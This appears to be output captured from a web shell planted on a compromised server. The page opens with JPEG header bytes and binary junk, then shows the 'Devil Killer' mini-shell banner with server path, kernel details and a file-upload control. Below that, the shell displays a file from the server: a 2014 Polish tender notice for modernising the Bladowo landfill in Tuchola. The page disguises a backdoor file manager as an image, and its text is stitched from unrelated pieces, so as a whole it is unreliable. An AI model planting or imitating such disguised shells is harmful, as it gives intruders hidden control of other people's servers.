JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140318/90550-N-2014.html

<p class="kh_header"><b>Tuchola: Rozbudowa i modernizacja składowiska odpadów
 w Bladowie gmina Tuchola</b><br>
<b>Numer ogłoszenia: 90550 - 2014; data zamieszczenia: 18.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunalne w Tucholi Spółka z o.o. , ul. Świecka 68, 89-500 Tuchola, woj. kujawsko-pomorskie.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo Komunalne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja składowiska odpadów
 w Bladowie gmina Tuchola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa i modernizacja zakładu zagospodarowania odpadów komunalnych w Bladowie gmina Tuchola, spełniającej wymagania Najlepszej Dostępnej Techniki (BAT), obejmującej wykonanie robót budowlanych dla potrzeb montażu linii technologicznych oraz kwatery składowania odpadów, a w tym dostawa linii technologicznych sortowni i kompostowni oraz wyposażenia, niezbędnych maszyn, urządzeń i pojazdów oraz dokonanie rozruchu, a także przygotowanie kompletnego wniosku o wydanie pozwolenia zintegrowanego oraz kompletnego wniosku o wydanie i uzyskanie prawomocnego pozwolenia na użytkowanie Obiektu.
Zamówienia obejmuje :
1)	Wykonanie robót polegających na rozbudowie i modernizacji składowiska odpadów w Bladowie, zgodnie z dokumentacją  projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych  i postanowieniami Specyfikacji Istotnych Warunków Zamówienia. 
2)	Dokonanie dostaw i montażu linii technologicznych, maszyn i urządzeń oraz wyposażenia.
3)	Przeprowadzenie prób końcowych, czyli  odbiory techniczne, rozruch mechaniczny i technologiczny oraz eksploatacyjny składowiska odpadów  w Bladowie.
4)	Przeszkolenie pracowników Zamawiającego w zakresie eksploatacji Zakładu.
5)	Dostarczenie kompletnej dokumentacji powykonawczej, instrukcji eksploatacji i konserwacji oraz     dokumentacji techniczno-ruchowej (DTR). 
6)	Uzyskanie niezbędnych uzgodnień i pozwoleń wynikających z przepisów prawa budowlanego i prawa ochrony środowiska, koniecznych do uzyskania pozwolenia na użytkowanie i pozwolenia zintegrowanego na użytkowanie Obiektu.
7)	Wykonanie wszelkich innych robót, dostaw, prac, które są konieczne dla uzyskania parametrów użytkowych i technologicznych Składowiska Odpadów w Bladowie, określonych niniejszą SIWZ.
8)	Przeglądy i usługi serwisowe w okresie gwarancji.


2.2.1 W ramach rozbudowy i modernizacji Składowiska Odpadów w Bladowie zostaną zrealizowane    następujące obiekty:
1)	Sortownia odpadów wraz z niezbędną infrastrukturą i częścią biurowo-socjalną.
2)	Kompostownia wraz z niezbędną infrastrukturą.
3)	Kwatera nr II wraz z niezbędną infrastrukturą.
4)	Instalacja odgazowania.
5)	Przebudowa budynku administracyjno-socjalnego.
6)	Remont istniejącego budynku magazynowego.
7)	Montaż stacji zlewnej w punkcie odbioru ścieków.
8)	Budowa wagi elektronicznej (montaż samochodowej wagi pojazdowej).
9)	Przebudowa brodzika dezynfekującego (montaż myjki dla pojazdów opuszczających teren  zakładu).
10)	Sieci energetyczne, wodno-kanalizacyjne i teletechniczne.
11)	Drogi technologiczne, place manewrowe, zieleń.
12)	Wiaty sprzętowe, budowa zadaszonych wiat na surowce wtórne.
2.2.2. W ramach rozbudowy i modernizacji Składowiska Odpadów w Bladowie dostarczone   zostaną następujące urządzenia stacjonarne, mobilne oraz wyposażenie :
1)	Stacja meteorologiczna
2)	Kompaktor
3)	Ładowarka kołowa
4)	Sito mobilne
5)	Ładowarka teleskopowa
6)	Wózek widłowy.
7)	Pryzmaciarka
8)	Hakowiec
9)	Kontenery
10)	Mobilna myjka wysokociśnieniowa
11)	Wyposażenie hal, budynku administracyjnego, warsztatu, myjni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.22.21.10-3, 45.00.00.00-9, 45.11.12.00-0, 45.22.30.00-6, 45.22.32.20-4, 45.22.33.00-9, 45.22.35.00-1, 45.23.31.20-6, 45.23.32.00-1, 45.31.10.00-0, 45.31.00.00-3, 45.31.60.00-5, 45.31.73.00-5, 45.31.61.00-6, 45.33.00.00-9, 45.23.10.00-5, 45.23.24.40-8, 45.23.24.23-3, 45.32.00.00-6, 45.32.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium ustala się w kwocie: 250 000 złotych
słownie : dwieście pięćdziesiąt tysięcy  złotych.
2.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego:
Bank : Bank Millennium S.A. w Tucholi
Nr rachunku :  49 1160 2202 0000 0000 60 9050 58 z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej zadania:  
 Rozbudowa i modernizacja składowiska odpadów
 w Bladowie gmina Tuchola
3.	Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
4.	Wadium może być wnoszone w formie: w pieniądzu, poręczenia bankowego, poręczenia pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przed?siębiorczości, które należy w formie oryginału zdeponować u Zamawiającego, a kopię załączyć do oferty.
5.	Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp. 
6.	Treść gwarancji wadialnej musi zawierać następujące informacje:
a)	nazwa i adres Zamawiającego;
b)	nazwę przedmiotu zamówienia;
c)	nazwę i adres Wykonawcy;
d)	termin ważności gwarancji;
7.	Wadium musi być wniesione nie później niż do  wyznaczonego terminu składania ofert. 
8.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
9.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
10.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
11.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego. 
12.	Zamawiający będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w okolicznościach, jak w pkt. 10, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
13.	W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.
14.	Zatrzymanie wadium nastąpi w okolicznościach :
a)	jeżeli wykonawca w odpowiedzi na wezwanie, o  którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
b)	jeżeli wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
c)	jeżeli wykonawca nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy,
d)	jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną o wartości min. 15 mln złotych netto, polegającą na budowie zakładu zagospodarowania odpadów komunalnych o przepustowości nie mniejszej niż 20.000 Mg na rok, obejmującą w swym zakresie:
a)	linię sortowniczą odpadów komunalnych niesegregowanych o przepustowości nie mniejszej niż 20.000 Mg na rok, w skład której wchodziły m.in. takie urządzenia jak: sito bębnowe do kwalifikacji odpadów, separatory elektromagnetyczne Fe,
której realizacja zakończyła się próbami końcowymi (rozruchem) z wynikiem pozytywnym oraz Zamawiający dokonał odbioru końcowego;
b)	linię technologiczną do kompostownia w systemie zamkniętym o wydajności min. 10.000 Mg na rok której realizacja zakończyła się próbami końcowymi (rozruchem) z wynikiem pozytywnym oraz Zamawiający dokonał odbioru końcowego;
lub
wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną o wartości min. 8 mln złotych netto, polegającą na budowie zakładu zagospodarowania odpadów komunalnych o przepustowości nie mniejszej niż 20.000 Mg na rok, obejmującą w swym zakresie linię sortowniczą odpadów komunalnych niesegregowanych o przepustowości nie mniejszej niż 20.000 Mg na rok, w skład której wchodziły m.in. takie urządzenia jak: sito bębnowe do kwalifikacji odpadów, separatory elektromagnetyczne Fe,
której realizacja zakończyła się próbami końcowymi (rozruchem) z wynikiem pozytywnym oraz Zamawiający dokonał odbioru końcowego;
i
wykonali co najmniej jedną robotę budowlaną o wartości min. 6 mln złotych netto, polegającą na budowie zakładu zagospodarowania odpadów komunalnych obejmującą w swym zakresie linię technologiczną do kompostownia w systemie zamkniętym o wydajności min. 10.000 Mg na rok której realizacja zakończyła się próbami końcowymi (rozruchem) z wynikiem pozytywnym oraz Zamawiający dokonał odbioru końcowego.
c)	co najmniej jedną robotę budowlaną, polegającą na budowie hali konstrukcji stalowej  o powierzchni użytkowej nie mniejszej, niż 1.000 m2;
d)	co najmniej jedną robotę budowlaną polegającą na budowie dróg i placów o powierzchni min. 5.000 m2;
e)	co najmniej jedną robotę budowlaną, polegającą na wykonaniu uszczelnienia dna i skarp kwatery  składowiska odpadów,  izolacją syntetyczną - geomembraną PEHD o powierzchni min. 20.000 m2;
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych i  dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; na zasadzie spełnia/nie spełnia.
Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że przekazanie potencjału przez inny podmiot będzie miało charakter rzeczywisty, faktyczny, pozwalający na realne wykorzystanie wiedzy i doświadczenia w toku realizacji zamówienia. Dysponowanie zasobami musi zostać udowodnione Zamawiającemu przez wykonawcę w sposób nie budzący wątpliwości co do tego, czy podmiot udostępniający swoje zasoby z zakresu wiedzy i doświadczenia posiada je i rzeczywiście udostępnia. Doświadczenie nie stanowi dobra, które może być przedmiotem samodzielnego obrotu. Doświadczenie stanowi składnik przedsiębiorstwa w znaczeniu przedmiotowym i dzieli byt prawny przedsiębiorstwa ( arg. art. 551 i art. 552 Kodeksu cywilnego ). Nie jest zatem możliwe udostępnienie doświadczenia bez jednoczesnego udostępnienia przedsiębiorstwa, z którym to doświadczenie jest związane. Z tych też względów dla potwierdzenia rzeczywistego udostępnienia zasobu doświadczenia, konieczny jest osobisty udział tego podmiotu w wykonywaniu zamówienia.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w pkt. 2, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.:
a)	koordynatorem - przedstawicielem wykonawcy (1 osoba) posiadającym wykształcenie wyższe, doświadczenie w pełnieniu funkcji koordynatora lub podobnej przy realizacji min. jednej zakończonej inwestycji z zakresu ochrony środowiska o wartości min. 10 mln złotych brutto;
b)	kierownikiem budowy (1 osoba) posiadającym wykształcenie wyższe, uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub uprawnienia budowlane do kierowania robotami budowlanymi w specjalności architektonicznej bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika budowy dla budowy będącej przedmiotem zamówienia, co najmniej 5-letnie doświadczenie zawodowe w budownictwie (licząc od dnia uzyskania uprawnień) w tym pełnienie funkcji kierownika budowy przy realizacji przynajmniej jednego zakładu gospodarki odpadami typu sortownia wraz z infrastrukturą towarzyszącą, o przepustowość nie mniejszej niż 15.000 Mg/rok;
c)	kierownikiem robót sanitarnych (1 osoba) posiadającym wykształcenie wyższe, uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
d)	kierownikiem robót elektrycznych (1 osoba) posiadającym wykształcenie wyższe, uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, doświadczenie w montażu urządzeń sterowania procesami technologicznymi sortowni odpadów komunalnych;
e)	kierownikiem robót drogowych (1 osoba) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
f)	specjalistą ds. montażu i rozruchu linii technologicznej segregacji odpadów posiadającym wykształcenie wyższe, doświadczenie zawodowe w kierowaniu montażem i rozruchem linii technologicznej segregacji odpadów komunalnych o wydajności min. 10.000 Mg/rok;
g)	specjalistą ds. montażu i rozruchu linii technologicznej biologicznego przetwarzania odpadów, posiadającym wykształcenie wyższe, doświadczenie zawodowe w kierowaniu montażem i rozruchem linii technologicznej biologicznego przetwarzania odpadów - kompostowni z fazą intensywną prowadzoną w systemie zamkniętym o wydajności min. 10.000 Mg/rok materiału wsadowego zakończonej odbiorem końcowym;
h)	specjalistą ds. automatyki i sterowania posiadającym wykształcenie wyższe, co najmniej 5-letnie doświadczenie zawodowe w tym pełnienie funkcji automatyka przy realizacji przynajmniej jednego zakładu gospodarki odpadami typu sortownia wraz z infrastrukturą towarzyszącą, o przepustowość nie mniejszej niż 20.000 Mg/rok, zakończonej odbiorem końcowym;
i)	posiadają średnioroczne zatrudnienie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w liczbie co najmniej 30 pracowników produkcyjnych, w tym 10 osób personelu kierowniczego;

Zamawiający dopuszcza łączenie funkcji specjalisty ds. montażu i rozruchu linii technologicznej segregacji odpadów z funkcją specjalisty ds. montażu i rozruchu linii technologicznej biologicznego przetwarzania odpadów.
Osoba wskazana do pełnienia obu funkcji musi spełniać wymagania dla obu łączonych funkcji.
Jeżeli wykonawca zatrudnić będzie specjalistów zagranicznych nie znających języka polskiego, wówczas wykonawca na własny koszt zatrudni biegłego tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym, a personelem na budowie, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia, stworzonych zarówno przez wykonawcę, jak i dostarczonych przez Zamawiającego. Tłumacz powinie być biegły w jednoznacznym tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych.

Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia i kwalifikacje; na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a)	posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 5 mln zł,
b)	osiągnęli w okresie ostatnich trzech lat obrachunkowych, a jeżeli okres działalności jest krótszy - w tym okresie, średnioroczne przychody netto ze sprzedaży w wysokości co najmniej 20 mln zł w każdym roku obrachunkowym,
c)	posiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 20  mln zł,
Ocena spełniania warunku zostanie dokonana na podstawie złożonych dokumentów tj.  informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, rachunku zysków i strat za ostatnie 3 lata obrotowe, opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia; na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  Wykonawca zobowiązany jest dołączyć do oferty dokumenty finansowe wymienione powyżej (jako podstawa do oceny spełnienia warunków) potwierdzające spełnienie wymagań finansowych przez ten podmiot. 
Jeżeli z uzasadnionych przyczyn wykonawca nie będzie mógł przedstawić wymaganych przez Zamawiającego dokumentów dotyczących sytuacji finansowej, to będzie mógł przedstawić inny dokument, który w wystarczający sposób potwierdzi spełniania tego warunku.
W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż w PLN, dane finansowe zostaną przeliczone według średniego kursu Narodowego Banku Polskiego (NBP) (strona internetowa: http://www.nbp.pl/Kursy/Kursya.html) opublikowanego w dniu ukazania się ogłoszenia o zamówieniu w BZP. Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

